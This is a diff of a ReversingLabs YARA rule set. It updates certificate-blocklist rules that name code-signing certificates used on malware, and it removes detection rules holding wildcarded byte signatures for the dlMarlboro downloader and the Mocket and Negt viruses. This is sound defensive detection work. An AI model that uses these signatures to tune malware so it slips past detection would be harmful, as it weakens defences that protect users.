"https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17200-L17216" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "8fd406004b634e4826659b1dff88c61074fd321969b9fd63ea45d8e9608b35f1" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11346-L11362" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "1a9263c809f5633d01d4d4d0091c8dc214bad73af0eff3c9a94b33bca513f26d" score = 75 quality = 90 tags = "INFO, FILE" @@ -23937,22 +43728,22 @@ rule REVERSINGLABS_Cert_Blocklist_525B5529Db20D17A85Be284D6B7952Ea : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Buster Ind Com Imp e Exp de Acessorios P Autos Ltda" and pe.signatures[i].serial=="52:5b:55:29:db:20:d1:7a:85:be:28:4d:6b:79:52:ea" and 1508198400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ACTIVUS LIMITED" and pe.signatures[i].serial=="1f:fc:98:25:64:4c:af:5b:1f:52:17:80:c5:c7:f4:2c" and 1615507200<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_8D52Fb12A2511E86Bbb0Ba75C517Eab0 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "98c19385-555e-5827-b03c-59645ad2a101" + id = "1bc9d36c-381e-5359-bba4-8dd870ed9267" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17218-L17234" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "017eed878daf706eb96b638a8d1f4428466bc1d00ce27f32628bd249a658a813" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11364-L11382" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "023830ab3d71ed8ecf8f0e271c56dc267dcd000f5ff156c70d31089cd7010da8" score = 75 quality = 90 tags = "INFO, FILE" @@ -23962,22 +43753,22 @@ rule REVERSINGLABS_Cert_Blocklist_70Ae0E517D2Ef6D5Eed06B56730A1A9A : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Yu Bao" and pe.signatures[i].serial=="70:ae:0e:51:7d:2e:f6:d5:ee:d0:6b:56:73:0a:1a:9a" and 1475193600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "VThink Software Consulting Inc." and (pe.signatures[i].serial=="00:8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0" or pe.signatures[i].serial=="8d:52:fb:12:a2:51:1e:86:bb:b0:ba:75:c5:17:ea:b0") and 1599177600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_332Bd5801E8415585E72C87E0E2Ec71D : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "47207784-5aee-5fa3-bed9-2c12d9932c38" + id = "d251afda-7582-5a00-a100-fd3acff2f995" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17236-L17252" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fd710146874528c43ad8a9f847b7704c44ba4564cf79e20e6b23aa98b0ee2ea5" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11384-L11400" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3648c3a8dbcdbd24746b9fa8cb3071d5f5019e5917848d88437158c6cb165445" score = 75 quality = 90 tags = "INFO, FILE" @@ -23987,22 +43778,22 @@ rule REVERSINGLABS_Cert_Blocklist_57C3717C5E2Ce9A2E0Cf0340C03F458E : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Citizen Travel Ltd" and pe.signatures[i].serial=="57:c3:71:7c:5e:2c:e9:a2:e0:cf:03:40:c0:3f:45:8e" and 1450915200<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Elite Marketing Strategies, Inc." and pe.signatures[i].serial=="33:2b:d5:80:1e:84:15:58:5e:72:c8:7e:0e:2e:c7:1d" and 1662616824<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_E3B80C0932B52A708477939B0D32186F : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "e8575a71-124b-5040-91b1-ccad371e10da" + id = "e7cdf040-3fe2-55ed-8f66-702fb4455653" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17254-L17270" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "0ba60e1f58c7335ba5aa261031d09ee83a0ee51e05f8f26078b2a5c776ad0add" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11402-L11420" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "acdfce4dc25cbc9e9817453d5cf56c7d319bebdf7a039ea47412ec3b2f68cb02" score = 75 quality = 90 tags = "INFO, FILE" @@ -24012,22 +43803,22 @@ rule REVERSINGLABS_Cert_Blocklist_0761110Efe0B688C469D687512828C1F : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "ENP Games Co., Ltd." and pe.signatures[i].serial=="07:61:11:0e:fe:0b:68:8c:46:9d:68:75:12:82:8c:1f" and 1433721600<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "BISOYETUTU LTD LIMITED" and (pe.signatures[i].serial=="00:e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f" or pe.signatures[i].serial=="e3:b8:0c:09:32:b5:2a:70:84:77:93:9b:0d:32:18:6f") and 1617062400<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE +rule REVERSINGLABS_Cert_Blocklist_C79F817F082986Bef3209F6723C8Da97 : INFO FILE { meta: description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "64aa17fe-676d-5c6e-babc-15b5e8dc72bb" + id = "b3978831-57d6-5f25-a271-fa4f449d37b3" date = "2023-11-08" modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/certificate/blocklist.yara#L17272-L17288" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "ef49a28a93d31c55dd2dfd3bec645f757a0a1a7eb8718ce92cf47bf9af126aed" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11422-L11440" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "a5960f4c2ed768ccc5779d3754f51463c7b14a3a887c690944add23fba464f1a" score = 75 quality = 90 tags = "INFO, FILE" @@ -24037,32049 +43828,12605 @@ rule REVERSINGLABS_Cert_Blocklist_08Aa03F385F870E3A6D243B74B1Dadf6 : INFO FILE importance = 25 condition: - uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "\\xE4\\xB8\\x9C\\xE8\\x8E\\x9E\\xE5\\xB8\\x82\\xE8\\x85\\xBE\\xE4\\xBA\\x91\\xE8\\xAE\\xA1\\xE7\\xAE\\x97\\xE6\\x9C\\xBA\\xE7\\xA7\\x91\\xE6\\x8A\\x80\\xE6\\x9C\\x89\\xE9\\x99\\x90\\xE5\\x85\\xAC\\xE5\\x8F\\xB8" and pe.signatures[i].serial=="08:aa:03:f3:85:f8:70:e3:a6:d2:43:b7:4b:1d:ad:f6" and 1352678400<=pe.signatures[i].not_after) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Al-Faris group d.o.o." and (pe.signatures[i].serial=="00:c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97" or pe.signatures[i].serial=="c7:9f:81:7f:08:29:86:be:f3:20:9f:67:23:c8:da:97") and 1616371200<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Downloader_Dlmarlboro : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1E5Efa53A14599Cc82F56F0790E20B17 : INFO FILE { meta: - description = "Yara rule that detects dlMarlboro downloader." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "4c99b5a4-dc6b-579b-b1bd-bd4c93c6e68c" - date = "2020-07-23" - modified = "2020-07-23" + id = "f87dac0c-4b46-5b30-a715-f21e7c3a98e0" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/downloader/Win32.Downloader.dlMarlboro.yara#L1-L79" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "465a3b3a9686889001ac0b929d0349e44b6015eaeed3386361366def5013164a" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11442-L11458" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "78cbfeb5d7b58029a5b4107f2a59e892ff9d71788cf74e88ac823cb85ba35a94" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Downloader" - tc_detection_name = "dlMarlboro" - tc_detection_factor = 3 + category = "INFO" importance = 25 - strings: - $ping_apnic = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7 - 85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57 - C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D - 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? - 8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $download_bin_1 = { - 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? - 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F2 8B C1 89 85 ?? - ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? C7 85 ?? - ?? ?? ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? - ?? ?? 83 EC ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 56 C6 01 - ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ?? - E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 - 05 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF 50 ?? 8D 4D ?? 51 8B - C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? - ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? - 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 - ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? - ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 - ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? - ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6 - 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ?? - ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ?? - ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? EB ?? 32 DB - } - $download_bin_2 = { - C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? - ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 8D 80 ?? ?? ?? ?? 89 - 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? - ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03 - C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83 - C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A - ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ?? - 83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83 - C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94 - C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 - E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ?? - ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? - ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 72 ?? 57 E8 ?? ?? ?? ?? 83 C4 - ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 - ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? - C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 EB ?? 8B 8D ?? ?? ?? - ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ?? - ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 - 5D C3 - } - condition: - uint16(0)==0x5A4D and $ping_apnic and $download_bin_1 and $download_bin_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Storeks LLC" and pe.signatures[i].serial=="1e:5e:fa:53:a1:45:99:cc:82:f5:6f:07:90:e2:0b:17" and 1623196800<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Virus_Mocket : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_0Cf2D0B5Bfdd68Cf777A0C12F806A569 : INFO FILE { meta: - description = "Yara rule that detects Mocket virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "878c2162-9a79-52e6-af7b-95f9667f9e78" - date = "2020-07-15" - modified = "2020-07-15" + id = "2900c6ae-9e61-5bad-a7b4-b8eca925a1ea" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Win32.Virus.Mocket.yara#L3-L58" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "af16974396efe7a1a46aa39b812482dcc49d0fe95db6640c1703db479e7ea9dc" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11460-L11476" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "4d8fd52cd12f9512c0b148f9915860152f108884d29617a5fbfd62500d3a14c4" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_name = "Mocket" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $mocket_body_1 = { - E8 00 00 00 00 5B 81 EB ?? ?? ?? ?? 8B 34 24 81 E6 00 00 FF FF E8 31 00 00 00 89 83 ?? ?? ?? ?? E8 4C 00 00 00 89 83 ?? - ?? ?? ?? E8 A2 00 00 00 E8 CD 00 00 00 E8 05 01 00 00 87 CB E3 0C B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 C3 66 81 3E 4D 5A - 75 0E 8B 7E 3C 03 FE 66 81 3F 50 45 75 02 96 C3 81 EE 00 00 01 00 81 FE 00 00 00 70 73 DD 33 C0 C3 8B 70 3C 03 F0 8B 76 - 78 03 F0 56 8B 76 20 03 F0 8B C6 33 D2 33 C9 8A 8B ?? ?? ?? ?? 8D BB ?? ?? ?? ?? 8B 34 02 03 B3 ?? ?? ?? ?? 83 C2 04 F3 - A6 75 E2 5E 8B C6 83 EA 04 D1 EA 8B 40 24 03 83 ?? ?? ?? ?? 33 C9 66 8B 0C 02 8B C6 8B 40 1C 03 83 ?? ?? ?? ?? C1 E1 02 - 8B 04 01 03 83 ?? ?? ?? ?? C3 8D BB ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 89 06 - 83 C6 04 B9 FF FF FF FF 32 C0 F2 AE 80 3F 90 75 DD C3 8D BB ?? ?? ?? ?? 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 - 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 C3 33 - C9 B1 03 8D BB ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? FF D0 E8 01 00 00 00 C3 C7 83 ?? ?? ?? ?? 00 00 00 00 8D 83 ?? ?? ?? ?? - } - $mocket_body_2 = { - 50 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 40 0B C0 74 53 48 89 83 ?? ?? ?? ?? E8 48 00 00 00 FE 83 ?? ?? ?? ?? 80 - BB ?? ?? ?? ?? 0A 74 29 8D BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 32 C0 F3 AA 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? 50 8B 83 ?? - ?? ?? ?? FF D0 0B C0 75 C3 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 60 8D B3 ?? ?? ?? ?? 56 8B 83 ?? ?? ?? ?? FF - D0 89 83 ?? ?? ?? ?? 68 80 00 00 00 56 8B 83 ?? ?? ?? ?? FF D0 E8 B7 01 00 00 40 0B C0 0F 84 75 01 00 00 48 89 83 ?? ?? - ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 0F 84 4D 01 00 00 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 - 0F 84 26 01 00 00 89 83 ?? ?? ?? ?? 8B 70 3C 03 F0 66 81 3E 50 45 0F 85 F7 00 00 00 81 7E 4C 4B 43 4F 4D 0F 84 EA 00 00 - 00 8B 4E 3C 51 8B 46 28 89 83 ?? ?? ?? ?? 8B 46 34 89 83 ?? ?? ?? ?? FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? - ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 59 8B 83 ?? ?? ?? ?? 05 ?? ?? ?? ?? E8 5C 01 00 00 89 83 ?? ?? ?? ?? 91 E8 21 01 00 00 - 40 0B C0 0F 84 B9 00 00 00 48 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 1F 01 00 00 0B C0 0F 84 91 00 00 00 89 83 ?? ?? ?? - } - $mocket_body_3 = { - ?? 8B 70 3C 03 F0 8B FE 83 C6 78 8B 57 74 C1 E2 03 03 F2 0F B7 47 06 48 6B C0 28 03 F0 8B 56 10 8B CA 03 56 14 52 8B C1 - 03 46 0C 89 47 28 8B 46 10 05 ?? ?? ?? ?? 8B 4F 3C E8 EA 00 00 00 89 46 10 89 46 08 8B 46 10 03 46 0C 89 47 50 81 4E 24 - 20 00 00 A0 C7 47 4C 4B 43 4F 4D 8D B3 ?? ?? ?? ?? 5A 87 FA 03 BB ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 EB 0B 8B 8B ?? ?? ?? - ?? E8 41 00 00 00 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? - 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 61 C3 33 C0 50 50 51 FF B3 ?? ?? - ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 C0 50 50 6A 03 50 6A 01 68 00 00 00 C0 56 - 8B 83 ?? ?? ?? ?? FF D0 C3 6A 00 51 6A 00 6A 04 6A 00 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 51 6A 00 6A 00 6A - 02 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 D2 F7 F1 0B D2 74 01 40 F7 E1 C3 - } - condition: - uint16(0)==0x5A4D and ($mocket_body_1 at pe.entry_point) and $mocket_body_2 and $mocket_body_3 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "PROTIP d.o.o. - v ste\\xC4\\x8Daju" and pe.signatures[i].serial=="0c:f2:d0:b5:bf:dd:68:cf:77:7a:0c:12:f8:06:a5:69" and 1611705600<=pe.signatures[i].not_after) } import "pe" -rule REVERSINGLABS_Win32_Virus_Negt : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Cert_Blocklist_F675139Ea68B897A865A98F8E4611F00 : INFO FILE { meta: - description = "Yara rule that detects Negt virus." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "80e83105-dd98-5fad-9119-f851ec3199af" - date = "2020-07-15" - modified = "2020-07-15" + id = "3bac20a3-1415-53af-9d04-a30aa7488dd7" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/virus/Win32.Virus.Negt.yara#L3-L94" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "43057ef111fc505678606386c8d428653da391f4b65844d81479ca05e3517346" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11478-L11496" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "2306e90d376f5de8a4eb6d4a696bc1781686d7094cb0a2db48019ee93c1bf60a" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Virus" - tc_detection_name = "Negt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - 